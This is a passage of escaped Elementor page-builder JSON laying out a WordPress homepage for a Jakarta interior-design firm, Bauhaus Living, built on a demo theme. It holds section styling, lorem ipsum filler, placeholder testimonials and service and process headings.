adding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic 